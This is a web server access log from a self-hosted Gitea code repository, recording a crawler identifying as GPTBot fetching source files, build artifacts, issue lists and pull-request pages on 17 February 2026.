200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19957] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12502] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17557] [Gzip 2.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11177] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12959] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 